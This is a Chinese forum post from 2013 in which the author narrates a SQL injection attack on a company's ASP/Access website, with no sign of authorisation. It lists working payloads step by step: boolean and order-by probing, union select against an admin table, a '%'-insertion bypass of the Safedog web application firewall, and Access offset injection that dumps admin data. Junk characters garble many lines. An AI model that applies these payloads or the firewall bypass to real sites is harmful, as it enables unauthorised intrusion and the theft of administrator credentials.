打开网站,一个企业站。. ^4 M) O5 B3 @2 |9 g
# i, ^* ^# m+ b8 }6 a" ?7 t/ y3 N/ c# E: X( j# i; e; z
顺手加个admin
( a; c: }9 P# _- J. U8 M( S7 V4 L0 j$ A# O: Y7 E2 g# e1 V
7 S% ~9 D6 M7 Z+ O
默认后台。- p- K R: {( X2 G+ A( d
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。4 n G% V9 |9 c9 S. L$ x
! v7 ]% \* p/ p2 r
- D m |$ F% c+ g: Y$ k7 k+ j$ A" `1 f( K- n3 Z
所以就不用御剑扫了,待会直接封IP。
; T& K0 C' v) p% t7 L- x2 ~ 0 x/ \& e# _1 g
用order by语句判断是否存在注入。7 z* x( x4 R& H! l# T% O
http://www.xxx.com /product_show.asp?id=997 order by 16 S# j0 n' m( | |
http://www.xxx.com /product_show.asp?id=997 order by 100
1 E' d) L8 ^( a现在存在注入,经测试后发现是9个字段。. k8 Y k3 |, D8 [$ m, I9 E
: g' ~) r2 ?- W* o接下来进行联合查询,猜是否存在admin表。, I- Y" i+ ?# _" s% {' f
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
$ [9 r) F' c' \2 k7 q
& M' L: V# Z! L6 ^' I2 L& p9 Y/ C0 N' x/ I& L T6 @* b
/ p9 A1 V& [9 F9 c- g
在select中间加个%,se%lect绕过安全狗。
9 A# ?7 O. k7 f6 Y0 V, D* f7 N$ k+ q+ n6 X
/ P- n: E$ y* w, R' l1 X发现存在admin表,然后开始手工猜常用的字段。; t( k6 ~1 {! F4 i P
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
0 N5 I2 I* O, f4 I
( a1 x0 u5 m4 D7 [6 }$ [1 Z突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
1 Z, i# s% s5 X7 I$ G 8 V# M% ^5 n8 [# p; v
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
. D+ ~ J' \) Uhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
. K. z& a( K" R: ^3 F% r! F0 ~% T' P好了,敏感内容出显了。
' D/ Y+ W5 `; V1 U4 U/ c
$ `6 T [1 L$ O9 j' f9 R; O7 l4 R' s- Z2 r0 K6 q3 L
, Z3 |* m* a& Y/ X- J! S; ^ |
发表于 2013-3-8 21:49:45
收藏
支持
反对